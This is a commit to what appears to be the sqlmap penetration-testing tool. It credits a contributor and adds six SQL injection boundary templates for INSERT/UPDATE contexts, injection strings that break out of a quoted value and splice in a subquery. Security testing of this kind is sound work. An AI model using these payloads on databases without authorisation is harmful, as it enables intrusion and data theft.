adding INSERT/UPDATE generic boundaries

stamparm · stamparm · commit 2e5222bfd8fa · 2011-10-28T11:00:09.000Z
diff --git a/doc/THANKS b/doc/THANKS
@@ -368,6 +368,9 @@ Christopher Patten <cpatten@sunera.com>
 Zack Payton <zack.payton@executiveinstruments.com>
     for reporting a minor bug
 
+Jaime Penalba <nighterman@painsec.com>
+    for contributing a patch for INSERT/UPDATE generic boundaries
+
 Travis Phillips <perfect_insanity2004@yahoo.com>
     for suggesting a minor enhancement
 
diff --git a/xml/payloads.xml b/xml/payloads.xml
@@ -485,7 +485,63 @@ Formats:
         <prefix>" WHERE [RANDNUM]=[RANDNUM]</prefix>
         <suffix></suffix>
     </boundary>
-    <!-- End of generic boundaries -->
+    <!-- End of pre-WHERE generic boundaries -->
+
+    <!-- INSERT/UPDATE generic boundaries (e.g. "INSERT INTO table VALUES ('$_REQUEST["name"]',...)"-->
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>' || (SELECT [RANDNUM1] FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>) || '</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>' || (SELECT [RANDNUM1] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>) || '</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1</where>
+        <ptype>1</ptype>
+        <prefix> + (SELECT [RANDNUM1] FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1</where>
+        <ptype>1</ptype>
+        <prefix> + (SELECT [RANDNUM1] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>' + (SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>) + '</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>' + (SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>) + '</suffix>
+    </boundary>
+    <!-- End of INSERT/UPDATE generic boundaries -->
 
 
     <!-- Boolean-based blind tests - WHERE/HAVING clause -->

-Original file line number
+Diff line change
 Zack Payton <[email protected]>
     for reporting a minor bug
 +Jaime Penalba <[email protected]>
 +    for contributing a patch for INSERT/UPDATE generic boundaries
++
 Travis Phillips <[email protected]>
     for suggesting a minor enhancement